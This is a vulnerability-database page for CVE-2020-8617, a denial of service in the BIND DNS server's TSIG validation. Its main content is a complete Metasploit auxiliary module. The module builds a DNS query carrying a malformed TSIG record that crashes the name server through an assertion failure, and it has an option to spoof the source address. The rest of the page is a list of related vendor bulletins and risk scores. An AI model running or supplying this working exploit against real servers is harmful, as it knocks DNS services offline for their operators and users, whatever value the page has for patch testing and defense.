Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BIND TSIG Badtime Query Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Tobias Klein, Shuto Imai, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 510 Views

BIND TSIG Badtime Query Denial of Service logic error in TSIG validity causing assertion failure in tsig.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Vulnerability in bind affects IBM Integrated Analytics System
10 Nov 202011:19
ibm
IBM Security Bulletins		Security Bulletin: IBM API Connect V10 is impacted by denial of service vulnerabilities in Crunchy kernel (CVE-2020-8616, CVE-2020-8617)
7 Oct 202023:02
ibm
IBM Security Bulletins		Security Bulletin: Cloud Pak for Security uses packages that are vulnerable to several CVEs
19 Oct 202115:38
ibm
IBM Security Bulletins		Security Bulletin: Publicly disclosed vulnerabilities from Bind affect IBM Netezza Host Management
10 Aug 202010:41
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in BIND affect AIX (CVE-2020-8616 and CVE-2020-8617)
21 Aug 202021:43
ibm
IBM Security Bulletins		Security Bulletin: Vulnerability in bind (CVE-2020-8616 and CVE-2020-8617).
22 Sep 202123:38
ibm
IBM Security Bulletins		Security Bulletin: BIND for IBM i is affected by CVE-2020-8616 and CVE-2020-8617
6 Jul 202022:37
ibm
0day.today		BIND - (TSIG) Denial of Service Exploit
27 May 202000:00
zdt
ALT Linux		Security fix for the ALT Linux 10 package bind version 9.11.19-alt1
19 May 202000:00
altlinux
ALT Linux		Security fix for the ALT Linux 8 package bind version 9.10.8.P1-alt2
26 May 202000:00
altlinux
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Capture  
include Msf::Auxiliary::UDPScanner  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'BIND TSIG Badtime Query Denial of Service',  
'Description' => %q{  
A logic error in code which checks TSIG validity can be used to  
trigger an assertion failure in tsig.c.  
},  
'Author' => [  
'Tobias Klein', # Research and Original PoC  
'Shuto Imai', # msf module author  
],  
'References' => [  
['CVE', '2020-8617'],  
['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],  
['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']  
],  
'DisclosureDate' => '2020-05-19',  
'License' => MSF_LICENSE,  
'DefaultOptions' => { 'ScannerRecvWindow' => 0 },  
'Notes' => {  
'Stability' => [CRASH_SERVICE_DOWN],  
'SideEffects' => [],  
'Reliability' => []  
}  
)  
)  
  
register_options([  
Opt::RPORT(53),  
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),  
])  
  
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')  
end  
  
def scan_host(ip)  
print_status("Sending packet to #{ip}")  
if datastore['SRC_ADDR']  
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])  
else  
scanner_send(payload, ip, rport)  
end  
end  
  
def payload  
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65  
query << "\x00\x00" # Flags: 0x0000 Standard query  
query << "\x00\x01" # Questions: 1  
query << "\x00\x00" # Answer RRs: 0  
query << "\x00\x00" # Authority RRs: 0  
query << "\x00\x01" # Additional RRs: 1  
  
# Domain Name  
query << get_domain # Random DNS Name  
query << "\x00" # [End of name]  
query << "\x00\x01" # Type: A (Host Address) (1)  
query << "\x00\x01" # Class: IN (0x0001)  
  
# Additional records. Name  
query << "\x0alocal-ddns"  
query << "\x00"  
  
query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)  
query << "\x00\xff" # Class: ANY (0x00ff)  
query << "\x00\x00\x00\x00" # Time to live: 0  
query << "\x00\x1d" # Data length: 29  
  
# Algorithm Name  
query << "\x0bhmac-sha256" # The algorithm for local-ddns is hmac-sha256  
query << "\x00"  
  
# Rest of TSIG  
query << "\x00\x00\x00\x00\x00\x00" # Time Signed: Jan 1, 1970 00:00:00.000000000 UTC  
query << "\x00\x00" # Fudge: 0  
query << "\x00\x00" # MAC Size: 0  
query << "\x00\x00" # Original Id: 0  
query << "\x00\x10" # Error: BadSig (16)  
query << "\x00\x00" # Other len: 0  
end  
  
def get_domain  
domain = "\x06#{Rex::Text.rand_text_alphanumeric(6)}"  
org = "\x03#{Rex::Text.rand_text_alphanumeric(3)}"  
domain + org  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 24.3
CVSS 3.15.9 - 7.5
EPSS0.92629
bindtsigbadtimequerydenial of servicelogic errorassertion failuretsig.c
510